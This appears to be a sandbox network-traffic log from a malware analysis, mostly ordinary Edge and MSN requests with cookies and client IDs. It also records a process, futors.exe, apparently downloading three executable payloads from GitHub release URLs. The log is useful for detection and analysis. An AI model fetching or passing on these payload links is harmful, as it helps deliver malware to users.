v-segcap10,prg-vid-cd,prg-vid-trdcache,1s-p2-bg-appanon,ads-bcn-cndomain,1s-blis-nocache,prg-cg-int-ad-pod,prg-1sw-tvid-t20-vp,1s-p2-vid-vp,prg-1sw-tvid-p2,prg-p2-txt2,prg-p2-uc3,prg-pr2-setdur-t2,prg-pr2-videos,prg-pr2-wtab-oo,prg-tv-p2-api,prg-tv-p2-segcap10,1s-ntp-tredisc,msph-benchmark,prg-pr2-lifecycleba,1s-pr2-evlcbackingapp,ntp-rsshimopth,ntp-rsshimopt,prg-1sw-crypinf,prg-cg-pwa-lock-sl,prg-wx-nsever,prg-1sw-cryptren,1s-ntf1-dynprevc,msph-adsrevpd,prg-cg-cfzhcnfx,prg-cg-lstfix,prg-bl-pblsrs,1s-efmpntp,prg-wx-waze,prg-cg-game-exp-14,prg-cg-game-exp-4,prg-1sw-tbrfltr,1s-uup-acthistory,prg-1sw-tvid-int-t1,1s-p1-vid-vs-int,prg-1sw-tvid-p1-int,prg-1sw-tvid-int-t2,1s-p2-vid-vp-int,prg-1sw-tvid-p2-int,prg-fin-rmar,prg-wx-pwafull,prg-wx-nempty,msph-helpbot,btie-ad-rtbrem-c,1s-ntf1-capcounter,prg-prismsd-itrcfbi1,1s-l2ntpflt5,1s-prism-imgintfbi,2412-i-paykv2-t,history_native_t,2501-dis-scw-t,prg-pr2-wwidgets-t,2412-i-fcopilot-t,1s-prg1-weath-clndrt,2410-bcopilotn-t,bing_native_chat_t,prg-sbrsb2-t2,prg-shboxntctfix,1s-pr2-prcotiers,prg-1sw-sa-gemadjquotav2t7,1s-unifdmodls,prg-1s-dwvid-wpo-ctr,1s-newsfeed-worknews,prg-ad-dispflts-tc,prg-pr2-dis-signal,1s-deprcate-pgids,bing_uni_iab_t,1s-ntp-cltrid-dedup,prg-pr2-imghttd-t,prg-pr2-imghtdd-t,prg-pr2-cstmztion-fture,1s-cstmztion-preview,1s-wx2-lwc,prg-1sw-wcro-ghads,1s-p1-promotedondmd,1s-p1-ua4osvhw,1s-wpo-pr1-promad,prg-1sw-hovertime,prg-1sw-twinshellwc,1s-wx-newswtxt,prg-1sw-wxaqifct,prg-wx-btide,prg-wx-ntide,prg-1sw-wethr-prvw,prg-cg-countermonitor,prg-pr2-l3gvf,1s-wpo-pr2-cc-layout3,1s-wpo-pr2-layout,prg-pr2-gvfl3,cmp-use-did-t,did-force-updt-t,use-digitalid-t,1s-wpo-xaplm,1s-wpo-xap-comp,1s-wpo-xapntp,1s-wpo-xapntpus,1s-xap-mix-t,1s-xapmix-ncwf,prg-ads-xapntp,prg-1sw-newe2e,1s-ls-uppermuid-c,prg-pr2-cetchfix,1s-wxshortcache,prg-widupsl-to,prg-sp-marmad25,prg-pr2-notifuup-c,prg-1sw-save2uup,1s-ntf1-save2uup,prg-pr2-save2uup,1s-ntf2-save2uup,prg-ad-price-tr-rf,prg-1sw-santf-spkan2t1,1s-mailman-auth,prg-pr2-forcehide-t,msphxap-batch8,prg-1sw-wxaqepp,1s-wxlongcache,msph-shorts,prg-1sw-wxaqoff,prg-wx-csaqi0,ads-ovrprop-c,ads-ovradnt-t,prg-cplt-sumfly1,prg-cp-fly
x-msedge-clientid: 1BCC9635343F60E02399838B3518610E
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
dnt: 1
content-type: application/json
x-ms-numberline: anaheimmuidads1=btie-cp-t2,anaheimmuidads3=btie-ovradnt-c,5qos=ads-nopostsq-t,5sk0=ads-creativelog,5sov=ads-usepme,5ui9=ads-anjson-migt,63hy=ads-nooutbrain,649x=ads-prcrid-bi,66ky=ads-fbk-gserver,6965=ads-bcn-cndomain,anaheimmuidads4=btie-ad-rtbrem-c,7da6=ads-ovrprop-c,7da7=ads-ovradnt-t
accept: */*
origin: https://ntp.msn.com
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: _C_ETH=1
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
priority: u=1, i

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
vary: Origin,Accept-Encoding
set-cookie: _C_ETH=1; expires=Fri, 28 Mar 2025 01:30:36 GMT; domain=.msn.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: sptmarket=en-us||gb|en-gb|en-gb|en||cf=8|RefA=56D82E2E1D4F430CAE32512B421C4F83.RefC=2025-03-29T01:30:36Z; expires=Mon, 29 Mar 2027 01:30:36 GMT; path=/
set-cookie: MUIDB=1BCC9635343F60E02399838B3518610E; expires=Thu, 23 Apr 2026 01:30:36 GMT; path=/; httponly
set-cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8; domain=.msn.com; path=/; httponly
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server-timing: total;dur=182
timing-allow-origin: https://ntp.msn.com
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
x-ceto-ref: 67e74d3ce99248b8a3e70093a2bcc857|AFD:56D82E2E1D4F430CAE32512B421C4F83|2025-03-29T01:30:36.352Z
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: 56D82E2E1D4F430CAE32512B421C4F83 Ref B: LON04EDGE0716 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
GET

https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=3&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=112ccc59-9f03-42d3-a383-dc33f57f6ff4&ii=1&c=17503273880073193789&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1_12-1_12

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=3&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=112ccc59-9f03-42d3-a383-dc33f57f6ff4&ii=1&c=17503273880073193789&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1_12-1_12 HTTP/2.0
host: srtb.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
cookie: _C_Auth=
cookie: sptmarket=en-us||gb|en-gb|en-gb|en||cf=8|RefA=56D82E2E1D4F430CAE32512B421C4F83.RefC=2025-03-29T01:30:36Z
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 204

cache-control: no-cache
pragma: no-cache
content-type: image/gif
expires: -1
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EF8A7BBB64C142188616196F829B4DDC Ref B: LON04EDGE0716 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
GET

https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=6&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=a389378f-8a95-4bbf-bd53-502764ae7d5d&ii=1&c=17063763683721794245&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-6&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1_12-1_12

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=6&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=a389378f-8a95-4bbf-bd53-502764ae7d5d&ii=1&c=17063763683721794245&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-6&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1_12-1_12 HTTP/2.0
host: srtb.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
cookie: _C_Auth=
cookie: sptmarket=en-us||gb|en-gb|en-gb|en||cf=8|RefA=56D82E2E1D4F430CAE32512B421C4F83.RefC=2025-03-29T01:30:36Z
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 204

cache-control: no-cache
pragma: no-cache
content-type: image/gif
expires: -1
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CB3ED71133484DF5AC293510BE53EF54 Ref B: LON04EDGE0716 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
GET

https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=15&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=4a86be1e-d183-4105-9db5-52830d41ddf0&ii=1&c=11770813772205298655&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-4&t=type.msft-content-card&dec=1_12-1_12

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=15&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=4a86be1e-d183-4105-9db5-52830d41ddf0&ii=1&c=11770813772205298655&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-4&t=type.msft-content-card&dec=1_12-1_12 HTTP/2.0
host: srtb.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
cookie: _C_Auth=
cookie: sptmarket=en-us||gb|en-gb|en-gb|en||cf=8|RefA=56D82E2E1D4F430CAE32512B421C4F83.RefC=2025-03-29T01:30:36Z
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 204

cache-control: no-cache
pragma: no-cache
content-type: image/gif
expires: -1
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A80986EC89964E0E9D820AB76B1D5AC4 Ref B: LON04EDGE0716 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
OPTIONS

https://srtb.msn.com/auction

msedge.exe

Remote address:

204.79.197.203:443

Request

OPTIONS /auction HTTP/2.0
host: srtb.msn.com
accept: */*
access-control-request-method: POST
access-control-request-headers: cache-control,content-type,x-ms-flightid,x-ms-numberline,x-msedge-clientid,x-msedge-market
origin: https://ntp.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=1, i

Response

HTTP/2.0 200

vary: Origin
set-cookie: sptmarket=en-us||gb|en-gb|en-gb|en||cf=8|RefA=3ABCB4F57CFD46FCB96608432370D9A3.RefC=2025-03-29T01:30:36Z; expires=Mon, 29 Mar 2027 01:30:36 GMT; path=/
access-control-allow-credentials: true
access-control-allow-headers: cache-control,content-type,x-ms-flightid,x-ms-numberline,x-msedge-clientid,x-msedge-market
access-control-allow-methods: POST
access-control-allow-origin: https://ntp.msn.com
access-control-max-age: 86400
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ceto-ref: 67e74d3ca3df42d58e50439ac83f2338|AFD:3ABCB4F57CFD46FCB96608432370D9A3|2025-03-29T01:30:36.259Z
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3ABCB4F57CFD46FCB96608432370D9A3 Ref B: LON04EDGE0806 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
content-length: 0
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/954811811/dc4de189-3672-406e-ba17-8726ca7beb9b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013035Z&X-Amz-Expires=300&X-Amz-Signature=2767bd71fc66b7986d952c20b9bafe3cf85c4da9287a5f4470013514905158c6&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgron12321.exe&response-content-type=application%2Foctet-stream

futors.exe

Remote address:

185.199.110.133:443

Request

GET /github-production-release-asset-2e65be/954811811/dc4de189-3672-406e-ba17-8726ca7beb9b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013035Z&X-Amz-Expires=300&X-Amz-Signature=2767bd71fc66b7986d952c20b9bafe3cf85c4da9287a5f4470013514905158c6&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgron12321.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 1219584
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Mar 2025 16:47:50 GMT
ETag: "0x8DD6BBCC7A30108"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9c1f666c-201e-0012-30a5-9d9a85000000
x-ms-version: 2025-01-05
x-ms-creation-time: Tue, 25 Mar 2025 16:47:50 GMT
x-ms-blob-content-md5: ZGJUhTNo1JMc7QQLRunURw==
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=gron12321.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Fastly-Restarts: 1
Accept-Ranges: bytes
Age: 6607
Date: Sat, 29 Mar 2025 01:30:38 GMT
X-Served-By: cache-iad-kcgs7200064-IAD, cache-lcy-eglc8600076-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 29, 0
X-Timer: S1743211838.452091,VS0,VE1
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/953100962/0fb6522f-c6fd-4f89-8ac9-d2cfdf8f9919?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013050Z&X-Amz-Expires=300&X-Amz-Signature=3a44b1e5fc6e0ace5cdd851d4d524dc12ec47ea8851a2a11e76c557df6355dc3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex1dskfmdsf.exe&response-content-type=application%2Foctet-stream

futors.exe

Remote address:

185.199.110.133:443

Request

GET /github-production-release-asset-2e65be/953100962/0fb6522f-c6fd-4f89-8ac9-d2cfdf8f9919?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013050Z&X-Amz-Expires=300&X-Amz-Signature=3a44b1e5fc6e0ace5cdd851d4d524dc12ec47ea8851a2a11e76c557df6355dc3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex1dskfmdsf.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 1135616
Content-Type: application/octet-stream
Last-Modified: Sat, 22 Mar 2025 15:17:11 GMT
ETag: "0x8DD69549E9EC73A"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9cbe6ffc-201e-004f-423e-9b9001000000
x-ms-version: 2025-01-05
x-ms-creation-time: Sat, 22 Mar 2025 15:17:11 GMT
x-ms-blob-content-md5: OSjGK2f8DXwftrzOO2qNRg==
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=alex1dskfmdsf.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Fastly-Restarts: 1
Accept-Ranges: bytes
Age: 5921
Date: Sat, 29 Mar 2025 01:30:50 GMT
X-Served-By: cache-iad-kiad7000137-IAD, cache-lcy-eglc8600076-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 512, 0
X-Timer: S1743211850.372375,VS0,VE1
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/956649226/4d80b2da-e546-43e3-8ae4-f6bdab322270?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013109Z&X-Amz-Expires=300&X-Amz-Signature=f670f6df372bfddfc0b556507bc103ffeef18dca4faf171da3224990ff4404c1&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Djokererer.exe&response-content-type=application%2Foctet-stream

futors.exe

Remote address:

185.199.110.133:443

Request

GET /github-production-release-asset-2e65be/956649226/4d80b2da-e546-43e3-8ae4-f6bdab322270?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013109Z&X-Amz-Expires=300&X-Amz-Signature=f670f6df372bfddfc0b556507bc103ffeef18dca4faf171da3224990ff4404c1&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Djokererer.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 729128
Content-Type: application/octet-stream
Last-Modified: Fri, 28 Mar 2025 16:03:09 GMT
ETag: "0x8DD6E120901A945"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1a623f7a-601e-003c-4cfb-9fc892000000
x-ms-version: 2025-01-05
x-ms-creation-time: Fri, 28 Mar 2025 16:03:09 GMT
x-ms-blob-content-md5: 5xTyF4S6MTv5sM6ywTiJWg==
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=jokererer.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Fastly-Restarts: 1
Accept-Ranges: bytes
Age: 6608
Date: Sat, 29 Mar 2025 01:31:10 GMT
X-Served-By: cache-iad-kiad7000064-IAD, cache-lcy-eglc8600076-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 34, 0
X-Timer: S1743211870.998571,VS0,VE0
GET

https://th.bing.com/th?id=ORMS.03d4aa3332e1565e1d5ecaf515f087c2&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /th?id=ORMS.03d4aa3332e1565e1d5ecaf515f087c2&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0 HTTP/2.0
host: th.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 27686
cache-control: public, max-age=2571217
date: Sat, 29 Mar 2025 01:30:36 GMT
x-cache: TCP_MEM_HIT from a92-122-54-60.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0.1-318443691900e5d3d78f5dd48f596007) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.3c367a5c.1743211836.2efb01a
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ORMS.2ad4add0ed16909bae4daa1d4a9a9228&pid=Wdp&w=268&h=140&qlt=90&c=1&rs=1&dpr=1&p=0

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /th?id=ORMS.2ad4add0ed16909bae4daa1d4a9a9228&pid=Wdp&w=268&h=140&qlt=90&c=1&rs=1&dpr=1&p=0 HTTP/2.0
host: th.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
